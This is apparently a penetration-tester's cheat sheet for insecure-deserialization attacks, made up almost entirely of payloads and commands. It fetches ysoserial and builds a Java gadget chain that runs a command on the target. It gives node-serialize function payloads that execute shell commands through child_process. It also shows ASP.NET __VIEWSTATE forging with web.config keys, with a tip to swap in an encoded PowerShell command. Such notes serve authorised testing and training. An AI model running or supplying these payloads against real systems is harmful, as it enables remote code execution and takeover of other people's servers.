Deserialization
Every serialized object is stating from
ac ed
hex value.
curl -o ysoserial.jar https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
## ------------------| Apache Tomcat 9.0.27
java -jar ysoserial.jar CommonsCollections4 "ping -c 1 10.10.14.25" | base64 -w 0 | xclip -selection clipboard
var serialize = require('node-serialize');
var payload = '{"rce":"_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ls /\', function(error, stdout, stderr) { console.log(stdout) });}()"}';
serialize.unserialize(payload);
_$$ND_FUNC$$_function (){require(\'child_process\').exec(\'ping -c 1 10.10.14.22\', function(error, stdout, stderr) { console.log(stdout) });}()
_$$ND_FUNC$$_function (){require(\"child_process\").exec(\"ping -c 1 10.10.14.22\", function(error, stdout, stderr) { console.log(stdout) });}()
ViewState
## ------------------| ASP .Net __VIEWSTATE
### Grab the decryptionAlgo, validationAlgo, decryptionKey & validationKey from web.config
## ------------------| List examples
.\ysoserial.exe -p ViewState --examples
## ------------------| MyOnTheGo
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties --path="/somepath/testaspx/test.aspx" --apppath="/testaspx/" --decryptionalg="<decryptionAlgo>" --decryptionkey="<decryptionKey>" --validationalg="<validationAlgo>" --validationkey="<validationKey>" -c "ping <IP>"
### Paste the ouput in to the __VIEWSTATE= and send the request.
### change the -c as powershell -EncodedCommand SQBFAFgAKA....
Last updated